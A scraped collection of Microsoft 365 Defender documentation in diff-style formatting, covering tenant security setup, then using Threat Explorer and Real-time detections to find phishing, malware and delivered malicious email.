-Custom policies are required if the business needs of your organization require policy settings that are *different than* or *aren't defined in* preset security policies. Or, if your organization requires a different user experience for quarantined messages (including notifications). For more information, see [Determine your protection policy strategy](mdo-deployment-guide.md#determine-your-protection-policy-strategy).
-
-## View dashboards and reports in the Microsoft Defender portal
-
-In the Defender portal at <https://security.microsoft.com> select **Reports**. Or, to go directly to the **Reports** page, use <https://security.microsoft.com/securityreports>.
-
-On the **Reports** page, you can view information about security trends and track the protection status of your identities, data, devices, apps, and infrastructure.
-
-The data in these reports becomes richer as your organization uses Office 365 services (keep this point in mind if you're piloting or testing). For now, be familiar with what you can monitor and take action on.
-
-On the **Reports** page at <https://security.microsoft.com/securityreports>, select **Email & collaboration** \> **Email & collaboration reports**.
-
-On the **Email & collaboration reports** page that opens, note the cards that are available. In any card, select **View details** to dig into the data. For more information, see the following articles:
--- [View email security reports in the Microsoft Defender portal](reports-email-security.md)-- [View Defender for Office 365 reports in the Microsoft Defender portal](reports-defender-for-office-365.md)-
-Mail flow reports and insights are available in the Exchange admin center (EAC). For more information, see [Mail flow reports](/exchange/monitoring/mail-flow-reports/mail-flow-reports) and [Mail flow insights](/exchange/monitoring/mail-flow-insights/mail-flow-insights).
-
-|If you're investigating or experiencing an attack against your tenant, use [Threat Explorer (or real-time detections)](threat-explorer-real-time-detections-about.md) to analyze threats. Explorer (and the real-time detections report) shows you the volume of attacks over time, and you can analyze this data by threat families, attacker infrastructure, and more. You can also mark any suspicious email for the Incidents list.
-
-## Additional considerations
-
-For information about ransomware protection, see the following articles:
--- [Protect against ransomware](/microsoft-365/business-premium/secure-your-business-data)-- [Malware and Ransomware Protection in Microsoft 365](/compliance/assurance/assurance-malware-and-ransomware-protection)-- [Ransomware incident response playbooks](/security/ransomware/)-
-## Configure tenant-wide sharing policies in SharePoint admin center
-
-Microsoft recommendations for configuring SharePoint team sites at increasing levels of protection, starting with baseline protection. For more information, see [Policy recommendations for securing SharePoint sites and files](zero-trust-identity-device-access-policies-sharepoint.md).
-
-SharePoint team sites configured at the baseline level allow sharing files with external users by using anonymous access links. This approach is recommended instead of sending files in email.
-
-To support the goals for baseline protection, configure tenant-wide sharing policies as recommended here. Sharing settings for individual sites can be more restrictive than this tenant-wide policy, but not more permissive.
-
-|Area|Includes a default policy|Recommendation|
-||||
-|**Sharing** (SharePoint Online and OneDrive for Business)|Yes|External sharing is enabled by default. These settings are recommended: <ul><li>Allow sharing to authenticated external users and using anonymous access links (default setting).</li><li>Anonymous access links expire in this many days. Enter a number, if desired, such as 30 days.</li><li>Default link type \> select Internal (people in the organization only). Users who wish to share using anonymous links must choose this option from the sharing menu.</li></ul> <br/> More information: [External sharing overview](/sharepoint/external-sharing-overview)|
-
-SharePoint admin center and OneDrive for Business admin center include the same settings. The settings in either admin center apply to both.
-
-## Configure settings in Microsoft Entra ID
-
-Be sure to visit these two areas in Microsoft Entra ID to complete tenant-wide setup for more secure environments.
-
-### Configure named locations (under conditional access)
-
-If your organization includes offices with secure network access, add the trusted IP address ranges to Microsoft Entra ID as named locations. This feature helps reduce the number of reported false positives for sign-in risk events.
-
-See: [Named locations in Microsoft Entra ID](/entra/identity/conditional-access/location-condition)
-
-### Block apps that don't support modern authentication
-
-Multi-factor authentication requires apps that support modern authentication. Apps that don't support modern authentication can't be blocked by using conditional access rules.
-
-For secure environments, be sure to disable authentication for apps that don't support modern authentication. You can do this in Microsoft Entra ID with a control that is coming soon.
-
-In the meantime, use one of the following methods to block access for apps in SharePoint Online and OneDrive for Business that don't support modern authentication:
--- **SharePoint admin center**:
- 1. In the SharePoint admin center at <https://admin.microsoft.com/sharepoint>, go to **Policies** \> **Access control**.
- 2. On the **Access control** page, select **Apps that don't use modern authentication**.
- 3. In the **Apps that don't use modern authentication** flyout that opens, select **Block access**, and then select **Save**.
--- **PowerShell**: See [Block apps that don't use modern authentication](/mem/intune/protect/app-modern-authentication-block).-
-## Get started with Defender for Cloud Apps or Office 365 Cloud App Security
-
-Use Microsoft 365 Cloud App Security to evaluate risk, to alert on suspicious activity, and to automatically take action. Requires Office 365 E5 plan.
-
-Or, use Microsoft Defender for Cloud Apps to obtain deeper visibility even after access is granted, comprehensive controls, and improved protection for all your cloud applications, including Office 365.
-
-Because this solution recommends the EMS E5 plan, we recommend you start with Defender for Cloud Apps so you can use it with other SaaS applications in your environment. Start with default policies and settings.
-
-More information:
--- [Deploy Defender for Cloud Apps](/cloud-app-security/getting-started-with-cloud-app-security)-- [More information about Microsoft Defender for Cloud Apps](https://www.microsoft.com/cloud-platform/cloud-app-security)-- [What is Defender for Cloud Apps?](/cloud-app-security/what-is-cloud-app-security)--
-## Additional resources
-
-These articles and guides provide additional prescriptive information for securing your Microsoft 365 environment:
--- [Microsoft security guidance for political campaigns, nonprofits, and other agile organizations](/microsoft-365/solutions/productivity-illustrations#security-guidance-for-political-campaigns-nonprofits-and-other-agile-organizations) (you can use these recommendations in any environment, especially cloud-only environments)--- [Recommended security policies and configurations for identities and devices](zero-trust-identity-device-access-policies-overview.md) (these recommendations include help for AD FS environments)
security Threat Explorer Email Security https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/threat-explorer-email-security.md
- Title: Email security with Threat Explorer and Real-time detections in Microsoft Defender for Office 365
- - NOCSH
---- Previously updated : 2/27/2024-
- - m365-security
- - tier1
-description: Use Threat Explorer (Explorer) or Real-time detections to view and investigate malware and phishing attempts in email.
--- seo-marvel-apr2020-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Email security with Threat Explorer and Real-time detections in Microsoft Defender for Office 365
--
-Microsoft 365 organizations that have [Microsoft Defender for Office 365](mdo-about.md) included in their subscription or purchased as an add-on have **Explorer** (also known as **Threat Explorer**) or **Real-time detections**. These features are powerful, near real-time tools to help Security Operations (SecOps) teams investigate and respond to threats. For more information, see [About Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-real-time-detections-about.md).
-
-This article explains how to view and investigate detected malware and phishing attempts in email using Threat Explorer or Real-time Detections.
-
-> [!TIP]
-> For other email scenarios using Threat Explorer and Real-time detections, see the following articles:
->
-> - [Threat hunting in Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-threat-hunting.md)
-> - [Investigate malicious email that was delivered in Microsoft 365](threat-explorer-investigate-delivered-malicious-email.md)
-
-## What do you need to know before you begin?
--- Threat Explorer is included in Defender for Office 365 Plan 2. Real-time detections is included in Defender for Office Plan 1:
- - The differences between Threat Explorer and Real-time detections are described in [About Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-real-time-detections-about.md).
- - The differences between Defender for Office 365 Plan 2 and Defender for Office Plan 1 are described in the [Defender for Office 365 Plan 1 vs. Plan 2 cheat sheet](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet).
--- For permissions and licensing requirements for Threat Explorer and Real-time detections, see [Permissions and licensing for Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#permissions-and-licensing-for-threat-explorer-and-real-time-detections).-
-## View phishing email sent to impersonated users and domains
-
-For more information about user and domain impersonation protection in anti-phishing policies in Defender for Office 365, see [Impersonation settings in anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
-
-In the default or custom anti-phishing policies, you need to specify the users and domains to protect from impersonation, including domains you own ([accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains)). In the Standard or Strict preset security policies, domains that you own automatically receive impersonation protection, but you need to specify any users or custom domains for impersonation protection. For instructions, see the following articles:
--- [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md)-- [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md)-
-Use the following steps to review phishing messages and search for impersonated users or domains.
-
-1. Use one of the following steps to open Threat Explorer or Real-time detections:
- - **Threat Explorer**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Explorer**. Or, to go directly to the **Explorer** page, use <https://security.microsoft.com/threatexplorerv3>.
- - **Real-time detections**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Real-time detections**. Or, to go directly to the **Real-time detections** page, use <https://security.microsoft.com/realtimereportsv3>.
-
-2. On the **Explorer** or **Real-time detections** page, select the **Phish** view. For more information about the **Phish** view, see [Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#phish-view-in-threat-explorer-and-real-time-detections).
-
-3. Select the date/time range. The default is yesterday and today.
-
-4. Do any of the following steps:
- - **Find any user or domain impersonation attempts**:
- - Select the **Sender address** (property) box, and then select **Detection technology** in the **Basic** section of the drop down list.
- - Verify **Equal any of** is selected as the filter operator.
- - In the property value box, select **Impersonation domain** and **Impersonation user**
-
- - **Find specific impersonated user attempts**:
- - Select the **Sender address** (property) box, and then select **Impersonated user** in the **Basic** section of the drop down list.
- - Verify **Equal any of** is selected as the filter operator.
- - In the property value box, enter the full email address of the recipient. Separate multiple recipient values by commas.
-
- - **Find specific impersonated domain attempts**:
- - Select the **Sender address** (property) box, and then select **Impersonated domain** in the **Basic** section of the drop down list.
- - Verify **Equal any of** is selected as the filter operator.
- - In the property value box, enter the domain (for example, contoso.com). Separate multiple domain values by commas.
-
-5. Enter more conditions using other filterable properties as required. For instructions, see [Property filters in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#property-filters-in-threat-explorer-and-real-time-detections).
-
-6. When you're finished creating the filter conditions, select **Refresh**.
-
-7. In the details area below the chart, verify the **Email** tab (view) is selected.
-
- You can sort the entries and show more columns as described in [Email view for the details area of the Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections).
-
- - If you select the **Subject** value of an entry in the table, an email details flyout opens. This details flyout is known as the _Email summary panel_ and contains standardized summary information that's also available on the [Email entity page](mdo-email-entity-page.md) for the message.
-
- For details about the information in the Email summary panel, see [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel).
-
- For information about the available actions at the top of the Email summary panel for Threat Explorer and Real-time detections, see [Email details from the Email view of the details area in the All email view](threat-explorer-real-time-detections-about.md#email-details-from-the-email-view-of-the-details-area-in-the-all-email-view) (the same actions are also available from the **Phish** view).
-
- - If you select the **Recipient** value of an entry in the table, a different details flyout opens. For more information, see [Recipient details from the Email view of the details area in the Phish view](threat-explorer-real-time-detections-about.md#recipient-details-from-the-email-view-of-the-details-area-in-the-phish-view).
-
-## Export URL click data
-
-You can export URL click data to a CSV file to view the **Network Message ID** and **Click verdict** values, which help explain where your URL click traffic came from.
-
-1. Use one of the following steps to open Threat Explorer or Real-time detections:
- - **Threat Explorer**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Explorer**. Or, to go directly to the **Explorer** page, use <https://security.microsoft.com/threatexplorerv3>.
- - **Real-time detections**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Real-time detections**. Or, to go directly to the **Real-time detections** page, use <https://security.microsoft.com/realtimereportsv3>.
-
-2. On the **Explorer** or **Real-time detections** page, select the **Phish** view. For more information about the **Phish** view, see [Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#phish-view-in-threat-explorer-and-real-time-detections).
-
-3. Select the date/time range, and then select **Refresh**. The default is yesterday and today.
-
-4. In the details area, select the **Top URLs** or **Top clicks** tab (view).
-
-5. In the **Top URLs** or **Top clicks** view, select one or more entries from the table by selecting the check box next to the first column, and then select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export**.
-**Explorer** \> **Phish** \> **Clicks** \> **Top URLs** or **URL Top Clicks** \> select any record to open the URL flyout.
-
-You can use the Network Message ID value to search for specific messages in Threat Explorer or Real-time detections or external tools. These searches identify the email message that's associated with a click result. Having the correlated Network Message ID makes for quicker and more powerful analysis.
-
-## View malware detected in email
-
-Use the following steps in Threat Explorer or Real-time detections to see the malware detected in email by Microsoft 365.
-
-1. Use one of the following steps to open Threat Explorer or Real-time detections:
- - **Threat Explorer**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Explorer**. Or, to go directly to the **Explorer** page, use <https://security.microsoft.com/threatexplorerv3>.
- - **Real-time detections**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Real-time detections**. Or, to go directly to the **Real-time detections** page, use <https://security.microsoft.com/realtimereportsv3>.
-
-2. On the **Explorer** or **Real-time detections** page, select the **Malware** view. For more information about the **Phish** view, see [Malware view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#malware-view-in-threat-explorer-and-real-time-detections).
-
-3. Select the date/time range. The default is yesterday and today.
-
-4. Select the **Sender address** (property) box, and then select **Detection technology** in the **Basic** section of the drop down list.
- - Verify **Equal any of** is selected as the filter operator.
- - In the property value box, select one or more of the following values:
- - **Anti-malware protection**
- - **File detonation**
- - **File detonation reputation**
- - **File reputation**
- - **Fingerprint matching**
-
-5. Enter more conditions using other filterable properties as required. For instructions, see [Property filters in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#property-filters-in-threat-explorer-and-real-time-detections).
-
-6. When you're finished creating the filter conditions, select **Refresh**.
-
-The report shows the results that malware detected in email, using the technology options you selected. From here, you can conduct further analysis.
-
-## Report messages as clean
-
-You can use the **Submissions** page in the Defender portal at <https://security.microsoft.com/reportsubmission> to [report messages as clean (false positives) to Microsoft](submissions-admin.md#report-good-email-to-microsoft). But you can also submit messages as clean to Microsoft from Explorer or Real-time detections.
-
-For instructions, see [Email remediation in Threat Explorer and Real-time detections](threat-explorer-threat-hunting.md#email-remediation).
-
-To summarize:
--- Select a message from the details table in the **Email** tab (view) in the **All email**, **Malware**, or **Phish** views by selecting the check box in the row, and then select **Message actions** and then one of the following options:
- - **Threat Explorer**: Select **Submit to Microsoft** in the **Start new submission** section. For further instruction, see [Start new submission actions in Threat Explorer](threat-explorer-threat-hunting.md#start-new-submission-actions-in-threat-explorer).
- - **Real-time detections**: Select **Report clean**. For further instruction, see [Start new submission actions in Real-time detections](threat-explorer-threat-hunting.md#start-new-submission-actions-in-real-time-detections).
-
-Or
--- Select a message from the details table in the **Email** tab (view) in the **All email**, **Malware**, or **Phish** views by clicking on the **Subject** value.-
- In the details flyout that opens, select :::image type="icon" source="../../medi#remediate-using-take-action).
-
-## View phishing URL and click verdict data
-
-Safe Links protection tracks URLs that were allowed, blocked, and overridden. Safe Links protection is on by default, thanks to Built-in protection in [preset security policies](preset-security-policies.md). Safe Links protection is on in the Standard and Strict preset security policies. You can also create and configure Safe Links protection in [custom Safe Links policies](safe-links-policies-configure.md). For more information about the Safe Links policy settings, see [Safe Links policy settings](recommended-settings-for-eop-and-office365.md#safe-links-policy-settings).
-
-Use the following steps to see phishing attempts using URLs in email messages.
-
-1. Use one of the following steps to open Threat Explorer or Real-time detections:
- - **Threat Explorer**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Explorer**. Or, to go directly to the **Explorer** page, use <https://security.microsoft.com/threatexplorerv3>.
- - **Real-time detections**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Real-time detections**. Or, to go directly to the **Real-time detections** page, use <https://security.microsoft.com/realtimereportsv3>.
-
-2. On the **Explorer** or **Real-time detections** page, select the **Phish** view. For more information about the **Phish** view, see [Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#phish-view-in-threat-explorer-and-real-time-detections).
-
-3. Select the date/time range. The default is yesterday and today.
-
-4. Select the **Sender address** (property) box, and then select **Click verdict** in the **URLs** section of the drop down list.
- - Verify **Equal any of** is selected as the filter operator.
- - In the property value box, select one or more of the following values:
- - **Blocked**
- - **Blocked overridden**
-
- For explanations of the **Click verdict** values, see **Click verdict** in [Filterable properties in the All email view in Threat Explorer](threat-explorer-real-time-detections-about.md#filterable-properties-in-the-all-email-view-in-threat-explorer).
-
-5. Enter more conditions using other filterable properties as required. For instructions, see [Property filters in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#property-filters-in-threat-explorer-and-real-time-detections).
-
-6. When you're finished creating the filter conditions, select **Refresh**.
-
-The **Top URLs** tab (view) in the details area below the chart shows the count of **Messages blocked**, **Messages junked**, and **Messages delivered** for the top five URLs. For more information, see [Top URLs view for the details area of the Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#top-urls-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections).
-
-The **Top clicks** tab (view) in the details area below the chart shows the top five clicked links that were wrapped by Safe Links. URL clicks on unwrapped links don't show up here. For more information, see [Top clicks view for the details area of the Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#top-clicks-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections).
-
-These URL tables show URLs that were blocked or visited despite a warning. This information shows the potential bad links that were presented to users. From here, you can conduct further analysis.
-
-Select a URL from an entry in the view for details. For more information, see [URL details for the Top URLs and Top clicks tabs in Phish view](threat-explorer-real-time-detections-about.md#top-urls-details-for-the-phish-view).
-
-> [!TIP]
-> In the URL details flyout, the filtering on email messages is removed to show the full view of the URL's exposure in your environment. This behavior lets you filter for specific email messages, find specific URLs that are potential threats, and then expand your understanding of the URL exposure in your environment without having to add URL filters in the **Phish** view.
-
-### Interpretation of click verdicts
-
-The **Click verdict** property results are visible in the following locations:
--- [Click verdict chart pivot for the URL clicks view of the details area of the All email view (Threat Explorer only) or Phish view](threat-explorer-real-time-detections-about.md#click-verdict-pivot-for-the-url-clicks-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)-- [Top clicks view for the details area of the All email view in Threat Explorer](threat-explorer-real-time-detections-about.md#top-clicks-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)-- [Top clicks view for the details area of the Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#top-clicks-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections)-- [Top clicks view for the details area of the URL clicks view in Threat Explorer](threat-explorer-real-time-detections-about.md#top-clicks-view-for-the-details-area-of-the-url-clicks-view-in-threat-explorer)-
-The verdict values are described in the following list:
--- **Allowed**: The user was allowed to open the URL.-- **Block overridden**: The user was blocked from directly opening the URL, but they overrode the block to open the URL.-- **Blocked**: The user was blocked from opening the URL.-- **Error**: The user was presented with the error page, or an error occurred in capturing the verdict.-- **Failure**: An unknown exception occurred while capturing the verdict. The user might have opened the URL.-- **None**: Unable to capture the verdict for the URL. The user might have opened the URL.-- **Pending verdict**: The user was presented with the detonation pending page.-- **Pending verdict bypassed**: The user was presented with the detonation page, but they overrode the message to open the URL.-
-## Start automated investigation and response in Threat Explorer
-
-[Automated investigation and response (AIR)](air-about.md) in Defender for Office 365 Plan 2 can save time and effort as you investigate and mitigate cyberattacks. You can configure alerts that trigger a security playbook, and you can start AIR in Threat Explorer. For details, see [Example: A security administrator triggers an investigation from Explorer](air-examples.md#example-a-security-administrator-triggers-an-investigation-from-threat-explorer).
-
-## Other articles
-
-[Investigate email with the Email entity page](mdo-email-entity-page.md)
security Threat Explorer Investigate Delivered Malicious Email https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/threat-explorer-investigate-delivered-malicious-email.md
- Title: Investigate malicious email that was delivered in Microsoft 365, find and investigate malicious email
-keywords: TIMailData-Inline, Security Incident, incident, Microsoft Defender for Endpoint PowerShell, email malware, compromised users, email phish, email malware, read email headers, read headers, open email headers,special actions
- - NOCSH
--- Previously updated : 2/27/2024--
- - MET150
- - MOE150
-
- - m365-security
- - tier1
-description: Learn how to use threat investigation and response capabilities to find and investigate malicious email.
--- seo-marvel-apr2020-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Investigate malicious email that was delivered in Microsoft 365
--
-Microsoft 365 organizations that have [Microsoft Defender for Office 365](mdo-about.md) included in their subscription or purchased as an add-on have **Explorer** (also known as **Threat Explorer**) or **Real-time detections**. These features are powerful, near real-time tools to help Security Operations (SecOps) teams investigate and respond to threats. For more information, see [About Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-real-time-detections-about.md).
-
-Threat Explorer and Real-time detections allow you to investigate activities that put people in your organization at risk, and to take action to protect your organization. For example:
--- Find and delete messages.-- Identify the IP address of a malicious email sender.-- Start an incident for further investigation.-
-This article explains how to use Threat Explorer and Real-time detections to find malicious email in recipient mailboxes.
-
-> [!TIP]
-> To go directly to the remediation procedures, see [Remediate malicious email delivered in Office 365](remediate-malicious-email-delivered-office-365.md).
->
-> For other email scenarios using Threat Explorer and Real-time detections, see the following articles:
->
-> - [Threat hunting in Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-threat-hunting.md)
-> - [Email security with Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-email-security.md)
-
-## What do you need to know before you begin?
--- Threat Explorer is included in Defender for Office 365 Plan 2. Real-time detections is included in Defender for Office Plan 1:
- - The differences between Threat Explorer and Real-time detections are described in [About Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-real-time-detections-about.md).
- - The differences between Defender for Office 365 Plan 2 and Defender for Office Plan 1 are described in the [Defender for Office 365 Plan 1 vs. Plan 2 cheat sheet](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet).
--- For filter properties that require you to select one or more available values, using the property in the filter condition with all values selected has the same result as not using the property in the filter condition.--- For permissions and licensing requirements for Threat Explorer and Real-time detections, see [Permissions and licensing for Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#permissions-and-licensing-for-threat-explorer-and-real-time-detections).-
-## Find suspicious email that was delivered
-
-1. Use one of the following steps to open Threat Explorer or Real-time detections:
- - **Threat Explorer**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Explorer**. Or, to go directly to the **Explorer** page, use <https://security.microsoft.com/threatexplorerv3>.
- - **Real-time detections**: In the Defender portal at <https://security.microsoft.com>, go to **Email & Security** \> **Real-time detections**. Or, to go directly to the **Real-time detections** page, use <https://security.microsoft.com/realtimereportsv3>.
-
-2. On the **Explorer** or **Real-time detections** page, select an appropriate view:
- - **Threat Explorer**: Verify the [All email view](threat-explorer-real-time-detections-about.md#all-email-view-in-threat-explorer) is selected.
- - **Real-time detections**: Verify the [Malware view](threat-explorer-real-time-detections-about.md#malware-view-in-threat-explorer-and-real-time-detections) is selected, or select the [Phish view](threat-explorer-real-time-detections-about.md#phish-view-in-threat-explorer-and-real-time-detections).
-
-3. Select the date/time range. The default is yesterday and today.
-
- :::image type="content" source="../../media/te-rtd-date-filter.png" alt-text="Screenshot of the date filter used in Threat Explorer and Real-time detections in the Defender portal." lightbox="../../media/te-rtd-date-filter.png":::
-
-4. Create one or more filter conditions using some or all of the following targeted properties and values. For complete instructions, see [Property filters in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#property-filters-in-threat-explorer-and-real-time-detections). For example:
-
- - **Delivery action**: The action taken on an email due to existing policies or detections. Useful values are:
- - **Delivered**: Email delivered to the user's Inbox or other folder where the user can access the message.
- - **Junked**: Email delivered to the user's Junk Email folder or Deleted Items folder where the user can access the message.
- - **Blocked**: Email messages that were quarantined, that failed delivery, or were dropped.
-
- - **Original delivery location**: Where email went before any automatic or manual post-delivery actions by the system or admins (for example, [ZAP](zero-hour-auto-purge.md) or moved to quarantine). Useful values are:
- - **Deleted items folder**
- - **Dropped**: The message was lost somewhere in mail flow.
- - **Failed**: The message failed to reach the mailbox.
- - **Inbox/folder**
- - **Junk folder**
- - **On-prem/external**: The mailbox doesn't exist in the Microsoft 365 organization.
- - **Quarantine**
- - **Unknown**: For example, after delivery, an Inbox rule moved the message to a default folder (for example, Draft or Archive) instead of to the Inbox or Junk Email folder.
-
- - **Last delivery location**: Where email ended-up after any automatic or manual post-delivery actions by the system or admins. The same values are available from **Original delivery location**.
-
- - **Directionality**: Valid values are:
- - **Inbound**
- - **Intra-org**
- - **Outbound**
-
- This information can help identify spoofing and impersonation. For example, messages from internal domain senders should be **Intra-org**, not **Inbound**.
-
- - **Additional action**: Valid values are:
- - **Automated remediation** (Defender for Office 365 Plan 2)
- - **Dynamic Delivery**: For more information, see [Dynamic Delivery in Safe Attachments policies](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies).
- - **Manual remediation**
- - **None**
- - **Quarantine release**
- - **Reprocessed**: The message was retroactively identified as good.
- - **ZAP**: For more information, see [Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365](zero-hour-auto-purge.md).
-
- - **Primary override**: If organization or user settings allowed or blocked messages that would have otherwise been blocked or allowed. Values are:
- - **Allowed by organization policy**
- - **Allowed by user policy**
- - **Blocked by organization policy**
- - **Blocked by user policy**
- - **None**
-
- These categories are further refined by the **Primary override source** property.
-
- - **Primary override source** The type of organization policy or user setting that allowed or blocked messages that would have otherwise been blocked or allowed. Values are:
-
- - **3rd Party Filter**
- - **Admin initiated time travel**
- - **Antimalware policy block by file type**: [Common attachments filter in anti-malware policies](anti-malware-protection-about.md#common-attachments-filter-in-anti-malware-policies)
- - **Antispam policy settings**
- - **Connection policy**: [Configure connection filtering](connection-filter-policies-configure.md)
- - **Exchange transport rule** (mail flow rule)
- - **Exclusive mode (User override)**: The **Only trust email from addresses in my Safe senders and domains list and Safe mailing lists** setting in the [safelist collection on a mailbox](configure-junk-email-settings-on-exo-mailboxes.md#use-exchange-online-powershell-to-configure-the-safelist-collection-on-a-mailbox).
- - **Filtering skipped due to on-prem organization**
- - **IP region filter from policy**: The **From these countries** filter in [anti-spam policies](anti-spam-protection-about.md#spam-properties-in-anti-spam-policies).
- - **Language filter from policy**: The **Contains specific languages** filter in [anti-spam policies](anti-spam-protection-about.md#spam-properties-in-anti-spam-policies).
- - **Phishing Simulation**: [Configure third-party phishing simulations in the advanced delivery policy](advanced-delivery-policy-configure.md#use-the-microsoft-defender-portal-to-configure-third-party-phishing-simulations-in-the-advanced-delivery-policy)
- - **Quarantine release**: [Release quarantined email](quarantine-admin-manage-messages-files.md#release-quarantined-email)
- - **SecOps Mailbox**: [Configure SecOps mailboxes in the advanced delivery policy](advanced-delivery-policy-configure.md#use-the-microsoft-defender-portal-to-configure-secops-mailboxes-in-the-advanced-delivery-policy)
- - **Sender address list (Admin Override)**: The allowed senders list or blocked senders list in [anti-spam policies](anti-spam-protection-about.md#allow-and-block-lists-in-anti-spam-policies).
- - **Sender address list (User override)**: Sender email addresses in the **Blocked Senders** list in the [safelist collection on a mailbox](configure-junk-email-settings-on-exo-mailboxes.md#use-exchange-online-powershell-to-configure-the-safelist-collection-on-a-mailbox).
- - **Sender domain list (Admin Override)**: The allowed domains list or blocked domains list in [anti-spam policies](anti-spam-protection-about.md#allow-and-block-lists-in-anti-spam-policies).
- - **Sender domain list (User override)**: Sender domains in the **Blocked Senders** list in the [safelist collection on a mailbox](configure-junk-email-settings-on-exo-mailboxes.md).
- - **Tenant Allow/Block List file block**: [Create block entries for files](tenant-allow-block-list-files-configure.md#create-block-entries-for-files)
- - **Tenant Allow/Block List sender email address block**: [Create block entries for domains and email addresses](tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-domains-and-email-addresses)
- - **Tenant Allow/Block List spoof block**: [Create block entries for spoofed senders](tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-spoofed-senders)
- - **Tenant Allow/Block List URL block**: [Create block entries for URLs](tenant-allow-block-list-urls-configure.md#create-block-entries-for-urls)
- - **Trusted contact list (User override)**: The **Trust email from my contacts** setting in the [safelist collection on a mailbox](configure-junk-email-settings-on-exo-mailboxes.md#use-exchange-online-powershell-to-configure-the-safelist-collection-on-a-mailbox).
- - **Tenant Allow/Block List file block**: [Create block entries for files](tenant-allow-block-list-files-configure.md#create-block-entries-for-files)
- - **Trusted domain (User override)**: Sender domains in the **Safe Senders** list in the [safelist collection on a mailbox](configure-junk-email-settings-on-exo-mailboxes.md#use-exchange-online-powershell-to-configure-the-safelist-collection-on-a-mailbox).
- - **Trusted recipient (User override)**: Recipient email addresses or domains in the **Safe Recipients** list in the [safelist collection on a mailbox](configure-junk-email-settings-on-exo-mailboxes.md#use-exchange-online-powershell-to-configure-the-safelist-collection-on-a-mailbox).
- - **Trusted senders only (User override)**: The **Safe Lists Only: Only mail from people or domains on your Safe Senders List or Safe Recipients List will be delivered to your Inbox** setting in the [safelist collection on a mailbox](configure-junk-email-settings-on-exo-mailboxes.md#use-exchange-online-powershell-to-configure-the-safelist-collection-on-a-mailbox).
-
- - **Override source**: Same available values as **Primary override source**.
-
- > [!TIP]
- > In the **Email** tab (view) in the details area of the **[All email](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)**, **[Malware](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-malware-view-in-threat-explorer-and-real-time-detections)**, and **[Phish](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections)** views, the corresponding override columns are named **System overrides** and **System overrides source**.
-
- - **URL threat**: Valid values are:
- - **Malware**
- - **Phish**
- - **Spam**
-
